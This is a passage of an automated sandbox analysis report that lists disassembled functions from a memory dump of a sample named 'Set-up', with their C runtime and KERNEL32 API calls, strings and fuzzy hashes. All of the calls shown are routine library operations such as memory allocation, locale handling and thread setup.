?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E), ref: 6BB9FD8D
?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000007,00000004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E), ref: 6BB9FD9B

Part of subcall function 6BB9B834: __EH_prolog3.LIBCMT ref: 6BB9B83B

?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000007,00000004,00000000), ref: 6BB9FDAF
?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000002,00000007,00000004,00000000), ref: 6BB9FDCC
TlsAlloc.KERNEL32(00000002,00000002,00000007,00000004,00000000), ref: 6BB9FDD7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E,?,6BBA558F,00000000), ref: 6BB9FDE5
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E,?,6BBA558F), ref: 6BB9FDFD
_CxxThrowException.MSVCR100(?,6BBFFEB4,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E), ref: 6BB9FE0B

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: Policy$Initialize$Concurrency@@Policy@Scheduler$ElementHeadKey@2@@ListValue@$??2@CountCriticalExceptionH_prolog3SectionSpinThrow$AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastV01@@_memsetmemcpystd::exception::exception
String ID:
API String ID: 4135718791-0
Opcode ID: 89bcfb0f911af8840bec4c02aafff4be9b636c2283016256087cfe5bdbb6719a
Instruction ID: 5871451b851c053fdaf0695e32e434177f98a30202cd7a3fcde4f6f1673b7fd0
Opcode Fuzzy Hash: 89bcfb0f911af8840bec4c02aafff4be9b636c2283016256087cfe5bdbb6719a
Instruction Fuzzy Hash: C151E6B1A00A86EBCB08DF75C881B98FBA4FF09314F54862ED52D97290D739A564CF90

Function 6BB6C737 Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 223COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT(?,?,00000000,?,00000180,00000000,?,?), ref: 6BB6C801

Strings

ccs, xrefs: 6BB72CA0
UTF-16LE, xrefs: 6BB72CED
UTF-8, xrefs: 6BB72CD5
UNICODE, xrefs: 6BB72D05

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: __wsopen_s
String ID: UNICODE$UTF-16LE$UTF-8$ccs
API String ID: 3347428461-3573488595
Opcode ID: a5f0fc52d73170c674f58b465093f0fb6c1f5978a840f01489bba054e6caa0cb
Instruction ID: 0ef91d48217b46183300e4b74214a60ccb6a5918272bf0d77460e0882f034f50
Opcode Fuzzy Hash: a5f0fc52d73170c674f58b465093f0fb6c1f5978a840f01489bba054e6caa0cb
Instruction Fuzzy Hash: B571F572C842CADEEB245F69C9467AE77B0EB12784F1140B6D86496181F3BD8E81CB51

Function 6BB6A428 Relevance: 22.6, APIs: 15, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

free.MSVCR100(?,6BB69233,-0000006C,?,?,6BB6A4AB,-0000006C,-0000006C,?,?,6BB64ECC,-0000006C), ref: 6BB6A48E
free.MSVCR100(?,6BB69233,-0000006C,?,?,6BB6A4AB,-0000006C,-0000006C,?,?,6BB64ECC,-0000006C), ref: 6BB76E9C
___free_lconv_mon.LIBCMT ref: 6BB76EA7
free.MSVCR100(?,6BB69233,-0000006C,?,?,6BB6A4AB,-0000006C,-0000006C,?,?,6BB64ECC,-0000006C), ref: 6BB76EBD
___free_lconv_num.LIBCMT ref: 6BB76EC8
free.MSVCR100(?,6BB69233,-0000006C,?,?,6BB6A4AB,-0000006C,-0000006C,?,?,6BB64ECC,-0000006C), ref: 6BB76ED5
free.MSVCR100(?,?,6BB69233,-0000006C,?,?,6BB6A4AB,-0000006C,-0000006C,?,?,6BB64ECC,-0000006C), ref: 6BB76EE0

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: free$___free_lconv_mon___free_lconv_num
String ID:
API String ID: 2838340673-0
Opcode ID: bc2212bb67cfc9f42f03ded92e5abec5d033d8b52a64ccedec0160ca487c8841
Instruction ID: db824adb0cce9594b1582ce1f885421fe6694e0ed168a58beef606793671cc0f
Opcode Fuzzy Hash: bc2212bb67cfc9f42f03ded92e5abec5d033d8b52a64ccedec0160ca487c8841
Instruction Fuzzy Hash: 7F316E725083C1DFDB20AF75DD89A5A77EAEF00394F50087AE16997160FB3DAD808B21

Function 6BB67F86 Relevance: 21.3, APIs: 14, Instructions: 349COMMON

Download Yara Rule

APIs

_calloc_crt.MSVCR100(00000001,00000050), ref: 6BB67FAC
_malloc_crt.MSVCR100(00000004), ref: 6BB67FBF

Part of subcall function 6BB60CD9: malloc.MSVCR100(00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60CE5

_malloc_crt.MSVCR100(00000004), ref: 6BB67FDD

Part of subcall function 6BB6767A: GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6BB676C4
Part of subcall function 6BB6767A: _calloc_crt.MSVCR100(00000000,00000002,?,?,00000000), ref: 6BB676D3
Part of subcall function 6BB6767A: GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6BB676EC

free.MSVCR100(00000000), ref: 6BB9170F
free.MSVCR100(00000000), ref: 6BB91718
free.MSVCR100(?,00000000), ref: 6BB91720
___free_lconv_mon.LIBCMT ref: 6BB91729
free.MSVCR100(00000000,00000000), ref: 6BB9172F
free.MSVCR100(?,00000000,00000000), ref: 6BB91737
free.MSVCR100(?,?,00000000,00000000), ref: 6BB9173F
free.MSVCR100(?), ref: 6BB9174F
free.MSVCR100(?,?), ref: 6BB9175A

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: free$InfoLocale_calloc_crt_malloc_crt$___free_lconv_monmalloc
String ID:
API String ID: 1432309319-0
Opcode ID: 020991a61e210b4e05efe26b82703e520435f5d4ee2bd0ec014dd2f312032c8e
Instruction ID: d862c8bd7d2f374d2c97b47fadc1b6f4a11e7312a48b3293371a681c6b712547
Opcode Fuzzy Hash: 020991a61e210b4e05efe26b82703e520435f5d4ee2bd0ec014dd2f312032c8e
Instruction Fuzzy Hash: 71B163B2940259AEE711CFB5CC81FEB77ADEB49780F140466FA05DB185FAB4DA408B60

Function 6BB60D61 Relevance: 21.2, APIs: 14, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_fileno.MSVCR100(?), ref: 6BB70EDD
_fileno.MSVCR100(?), ref: 6BB70EF2
_fileno.MSVCR100(?), ref: 6BB70F02
_fileno.MSVCR100(?,?), ref: 6BB70F12
_fileno.MSVCR100(?), ref: 6BB70F2F
_fileno.MSVCR100(?), ref: 6BB70F3F
_fileno.MSVCR100(?), ref: 6BB70F4F
_fileno.MSVCR100(?,?), ref: 6BB70F5F
_fileno.MSVCR100(?), ref: 6BB70F7C
_fileno.MSVCR100(?), ref: 6BB70F8C
_fileno.MSVCR100(?), ref: 6BB70F9C
_fileno.MSVCR100(?,?), ref: 6BB70FAC
__cftof.LIBCMT(?,00000040,00000005,?), ref: 6BB70FD2

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _fileno$__cftof
String ID:
API String ID: 813615167-0
Opcode ID: fee85dbb746cc57822a84aa5661fc8014223f5e4df4e44d7eef2da69b4267393
Instruction ID: 1cc799a3b867697b2fe364f274530ca2b6049623085b5d73cf88b11722c176ef
Opcode Fuzzy Hash: fee85dbb746cc57822a84aa5661fc8014223f5e4df4e44d7eef2da69b4267393
Instruction Fuzzy Hash: FE4104321046E59EC7259F38DC829AE37B4DE46764364076AE5709F1D0EB3CDE42CB90

Function 6BB6203F Relevance: 21.1, APIs: 14, Instructions: 108threadCOMMON

Download Yara Rule

APIs

__set_flsgetvalue.MSVCR100(6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6206A

Part of subcall function 6BB6067B: TlsGetValue.KERNEL32(?,6BB606AF), ref: 6BB60684

TlsGetValue.KERNEL32(6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6207B
_calloc_crt.MSVCR100(00000001,00000214), ref: 6BB6208E
DecodePointer.KERNEL32(00000000), ref: 6BB620AC
_initptd.MSVCR100(00000000,00000000), ref: 6BB620BE

Part of subcall function 6BB6215F: GetModuleHandleW.KERNEL32(KERNEL32.DLL,6BB62200,00000008,6BB875E9,00000000,00000000), ref: 6BB62170
Part of subcall function 6BB6215F: _lock.MSVCR100(0000000D), ref: 6BB621A4
Part of subcall function 6BB6215F: InterlockedIncrement.KERNEL32(?), ref: 6BB621B1
Part of subcall function 6BB6215F: _lock.MSVCR100(0000000C), ref: 6BB621C5

GetCurrentThreadId.KERNEL32 ref: 6BB620C5
__freeptd.LIBCMT ref: 6BB625B1
__heap_init.LIBCMT ref: 6BB6B235
GetCommandLineA.KERNEL32(6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB6B266
GetCommandLineW.KERNEL32 ref: 6BB6B271
__ioterm.LIBCMT ref: 6BB780B2
free.MSVCR100(00000000), ref: 6BB87485

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: CommandLineValue_lock$CurrentDecodeHandleIncrementInterlockedModulePointerThread__freeptd__heap_init__ioterm__set_flsgetvalue_calloc_crt_initptdfree
String ID:
API String ID: 2121586863-0
Opcode ID: 28f943b628af99a16f581e468e2fd51ab3cb885a4809a5ac1eabb1803253b8ca
Instruction ID: bd07b703933d4d23dc0e4314a52826572615b7f4992468d625a3bac775ef4273
Opcode Fuzzy Hash: 28f943b628af99a16f581e468e2fd51ab3cb885a4809a5ac1eabb1803253b8ca
Instruction Fuzzy Hash: 6331A13190A6C19EEB313FB68D5261E3BB0EF46798B24456AD865C1040FF7EC9808B67

Function 6BB6F4EC Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator=.LIBCMT ref: 6BB6F556
DName::DName.LIBCMT ref: 6BB8DD78

Strings

union , xrefs: 6BB71AF1
enum , xrefs: 6BB8DD45
cointerface , xrefs: 6BB8DD20
unknown ecsu', xrefs: 6BB8DD73
struct , xrefs: 6BB6F5A3
class , xrefs: 6BB6F54E
coclass , xrefs: 6BB8DD2A

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: NameName::Name::operator=
String ID: class $coclass $cointerface $enum $struct $union $unknown ecsu'
API String ID: 1765408024-3025788322
Opcode ID: 99c37a5d4c6041c15a7f915dae3ec73c2937215790057861302a7499ccf531d5
Instruction ID: e418d83c3cb50d1ab9c31be700b0acef5730305433c33d60650b0eba4cdabcd8
Opcode Fuzzy Hash: 99c37a5d4c6041c15a7f915dae3ec73c2937215790057861302a7499ccf531d5
Instruction Fuzzy Hash: 9D317E35940589AFCF04DFACD851AAEB7B5FB45795F1044ABE825A7240EB38DE00CB60

Function 6BBA012C Relevance: 19.7, APIs: 13, Instructions: 164COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCR100(00000008,880653CF,?,?), ref: 6BBA0169

Part of subcall function 6BB602C1: malloc.MSVCR100(?), ref: 6BB602CC

?GetProcessorNodeCount@Concurrency@@YAIXZ.MSVCR100(880653CF,?,?), ref: 6BBA01A4
??_U@YAPAXI@Z.MSVCR100(00000000,880653CF,?,?), ref: 6BBA01BD
??_U@YAPAXI@Z.MSVCR100(00000000,880653CF,?,?), ref: 6BBA01D8
_memset.LIBCMT(?,00000000,?,880653CF,?,?), ref: 6BBA01EC
_memset.LIBCMT(?,00000000,?,880653CF,?,?), ref: 6BBA01FF
CreateSemaphoreW.KERNEL32(00000000,00000000,7FFFFFFF,00000000,?,?,?,880653CF,?,?), ref: 6BBA024F
GetLastError.KERNEL32(?,?,?,880653CF,?,?), ref: 6BBA025F
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,880653CF,?,?), ref: 6BBA0278
_CxxThrowException.MSVCR100(?,6BBFFEB4,00000000,?,?,?,880653CF,?,?), ref: 6BBA0287
??2@YAPAXI@Z.MSVCR100(0000000C,?,?,?,880653CF,?,?), ref: 6BBA028E
??2@YAPAXI@Z.MSVCR100(00004004,?,?,?,880653CF,?,?), ref: 6BBA02B0
_memset.LIBCMT(00000000,00000000,00004004,?,?,?,880653CF,?,?), ref: 6BBA02C1

Part of subcall function 6BBA16DE: _memset.LIBCMT(?,00000000,0000003E,00000000,00000000), ref: 6BBA16FD

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _memset$??2@$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorConcurrency@@Count@CreateErrorExceptionLastNodeProcessorSemaphoreThrowmalloc
String ID:
API String ID: 1488694034-0
Opcode ID: 669d2f5ba92d37a543ba7d8e317cc681946b6bd4b4555842f44adaa0d82b91e9
Instruction ID: ab310dabe969bc400a90d5da8155fa73ab2471e50efef7424fddfcb8665134bc
Opcode Fuzzy Hash: 669d2f5ba92d37a543ba7d8e317cc681946b6bd4b4555842f44adaa0d82b91e9
Instruction Fuzzy Hash: 1651C5B15057819FD724CF38C882B2ABBE4FF49354F104A3EE15AC7690EB39E8418B54

Function 6BB74F02 Relevance: 19.6, APIs: 13, Instructions: 147stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

_strnlen.LIBCMT(?,?), ref: 6BB74F26
__crtLCMapStringA.MSVCR100(?,?,00000100,?,000000FF,00000000,00000000,?,00000001), ref: 6BB74F5A
__crtLCMapStringA.MSVCR100(?,?,00000100,?,000000FF,00000000,00000000,?,00000001), ref: 6BB74FD5
strcpy_s.MSVCR100(?,?,00000000), ref: 6BB74FEC
_freea_s.MSVCR100(00000000), ref: 6BB74FF9
_errno.MSVCR100 ref: 6BB8C372
_invalid_parameter_noinfo.MSVCR100 ref: 6BB8C37C
_errno.MSVCR100 ref: 6BB8C3AD
_errno.MSVCR100 ref: 6BB8C3B8
_errno.MSVCR100 ref: 6BB8C3C7
malloc.MSVCR100(00000008), ref: 6BB8C3D1
_errno.MSVCR100 ref: 6BB8C3EA
_errno.MSVCR100 ref: 6BB8C3F7

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$String__crt$_freea_s_invalid_parameter_noinfo_strnlenmallocstrcpy_s
String ID:
API String ID: 2430913482-0
Opcode ID: bffce4714c6168f6be62a5bd0fc60cd49985d1cb5e947cb22730b20e0d0c7835
Instruction ID: 4cf46a2aae1c33acad5593df47836d0ef0bed26e9c5a4bb478d6dc6326364f83
Opcode Fuzzy Hash: bffce4714c6168f6be62a5bd0fc60cd49985d1cb5e947cb22730b20e0d0c7835
Instruction Fuzzy Hash: F24134716082C5EFEB145F75DC81B9E3BB0EF46754F1001A9E4289F290EB7D8942CBA1

Function 6BB63BF7 Relevance: 19.6, APIs: 13, Instructions: 145COMMONLIBRARYCODE

Download Yara Rule

APIs

wcsnlen.MSVCR100(?,?,?,?,?,?,?,?,6BB63C95,?,?,?), ref: 6BB63C1B
_errno.MSVCR100(?,?,?,?,?,?,6BB63C95,?,?,?), ref: 6BB8C5A3
_invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,6BB63C95,?,?,?), ref: 6BB8C5AD
___crtLCMapStringW.LIBCMT(?,00000100,?,000000FF,00000000,00000000,?,?,?,?,?,?,6BB63C95,?,?,?), ref: 6BB8C5CA
_errno.MSVCR100(?,?,6BB63C95,?,?,?), ref: 6BB8C5DB
_errno.MSVCR100(?,?,6BB63C95,?,?,?), ref: 6BB8C5E6
_errno.MSVCR100(?,?,6BB63C95,?,?,?), ref: 6BB8C5FC
malloc.MSVCR100(00000008,?,?,6BB63C95,?,?,?), ref: 6BB8C634
_errno.MSVCR100(?,?,6BB63C95,?,?,?), ref: 6BB8C650
___crtLCMapStringW.LIBCMT(?,00000100,?,000000FF,00000000,00000000,?,?,6BB63C95,?,?,?), ref: 6BB8C66B
wcscpy_s.MSVCR100(?,?,00000000,?,?,?,?,?,?,?,?,6BB63C95,?,?,?), ref: 6BB8C67C
_freea_s.MSVCR100(00000000,?,?,?,?,?,?,?,?,6BB63C95,?,?,?), ref: 6BB8C695

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$String___crt$_freea_s_invalid_parameter_noinfomallocwcscpy_swcsnlen
String ID:
API String ID: 4082481270-0
Opcode ID: 60193fc2cb40f566f266439dff3dbdc6f25d3998a3153d0dc76023f8e3518b7c
Instruction ID: e3cc292e29eed0d375ce05ef164b6a3d467e0960b9933e84e3f91ed551d37d6a
Opcode Fuzzy Hash: 60193fc2cb40f566f266439dff3dbdc6f25d3998a3153d0dc76023f8e3518b7c
Instruction Fuzzy Hash: 8641B7B1604285AFDB145F79DC82E6E37A4DF46798B10027AF514DB290FB7CCD408B65

Function 6BB6CCC4 Relevance: 19.6, APIs: 13, Instructions: 145COMMONLIBRARYCODE

Download Yara Rule

APIs

wcsnlen.MSVCR100(?,?,?,?,?,?,?,?,6BB6CD55,?,?,?), ref: 6BB6CCE8
_errno.MSVCR100(?,?,?,?,?,?,6BB6CD55,?,?,?), ref: 6BB8C84E
_invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,6BB6CD55,?,?,?), ref: 6BB8C858
___crtLCMapStringW.LIBCMT(?,00000200,?,000000FF,00000000,00000000,?,?,?,?,?,?,6BB6CD55,?,?,?), ref: 6BB8C875
_errno.MSVCR100(?,?,6BB6CD55,?,?,?), ref: 6BB8C886
_errno.MSVCR100(?,?,6BB6CD55,?,?,?), ref: 6BB8C891
_errno.MSVCR100(?,?,6BB6CD55,?,?,?), ref: 6BB8C8A7
malloc.MSVCR100(00000008,?,?,6BB6CD55,?,?,?), ref: 6BB8C8DF
_errno.MSVCR100(?,?,6BB6CD55,?,?,?), ref: 6BB8C8FB
___crtLCMapStringW.LIBCMT(?,00000200,?,000000FF,00000000,00000000,?,?,6BB6CD55,?,?,?), ref: 6BB8C916
wcscpy_s.MSVCR100(?,?,00000000,?,?,?,?,?,?,?,?,6BB6CD55,?,?,?), ref: 6BB8C927
_freea_s.MSVCR100(00000000,?,?,?,?,?,?,?,?,6BB6CD55,?,?,?), ref: 6BB8C940

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$String___crt$_freea_s_invalid_parameter_noinfomallocwcscpy_swcsnlen
String ID:
API String ID: 4082481270-0
Opcode ID: 2c13a29a1d925143d781af65c820b9608163722931f1573a2a11b60e5209cc42
Instruction ID: f8b1116aa11dcd7a99ef3fa2a6b42383d618de8f118322b296214b13fac90255
Opcode Fuzzy Hash: 2c13a29a1d925143d781af65c820b9608163722931f1573a2a11b60e5209cc42
Instruction Fuzzy Hash: 2E4106B1A44284BFEB045F78ECC1D7E37A4EF46794B1002AAE5149B290FB7CCD408BA1

Function 6BB649C8 Relevance: 19.6, APIs: 13, Instructions: 140stringCOMMON

Download Yara Rule

APIs

_malloc_crt.MSVCR100(00000355,00000000,6BB64E81,00000001,00000000,00000000), ref: 6BB649DC

Part of subcall function 6BB60CD9: malloc.MSVCR100(00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60CE5

Part of subcall function 6BB6498E: strcat_s.MSVCR100(6BB65C30,6BB65C0F,6BB65C20,?,00000083,00000083,?,6BB65C24,6BB65C0F,6BB65C30,00000002,6BB65C30,6BB65C0F,?,00000000,00000000), ref: 6BB649AD

strcat_s.MSVCR100(00000004,00000351,6BB6498C,?,?,?,?,?,00000000,6BB64E81,00000001,00000000), ref: 6BB64A29
strcmp.MSVCR100(00000000,00000010,?,?,?,?,?,?,?,?,00000000,6BB64E81,00000001,00000000), ref: 6BB64A46
free.MSVCR100(6BB64E81,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BB64A8D
__invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,6BB64E81,00000001), ref: 6BB90BD9
free.MSVCR100(?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,6BB64E81), ref: 6BB90BE1

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: freestrcat_s$__invoke_watson_malloc_crtmallocstrcmp
String ID:
API String ID: 1358975119-0
Opcode ID: d4bd5e1de187d324ac2dbf7d1ceb68e0d9a8c46f7a163dad32a650accd3a9ef7
Instruction ID: 102941d75ebea4338657f297d79326aaeaca759a61b2e08078f623f96b64d2cd
Opcode Fuzzy Hash: d4bd5e1de187d324ac2dbf7d1ceb68e0d9a8c46f7a163dad32a650accd3a9ef7
Instruction Fuzzy Hash: 7D416871904B85EFDB20AF6ADC91A5EBBF8EF01788B100869E041E7660F779E944CB10

Function 6BB62423 Relevance: 19.6, APIs: 13, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

_lock.MSVCR100(0000000D,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB62497

Part of subcall function 6BB60C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60C5E

InterlockedDecrement.KERNEL32(?), ref: 6BB624A9
_lock.MSVCR100(0000000C,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB624C5
free.MSVCR100(00000000,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB624F9
free.MSVCR100(00000000), ref: 6BB87615
free.MSVCR100(?,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB87621
free.MSVCR100(?,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB8762D
free.MSVCR100(?,6BB62508,00000008,6BB62592,00000000,?,6BB625B6,00000000,6BB620E0,00000008,6BB62116,00000001,?), ref: 6BB87639
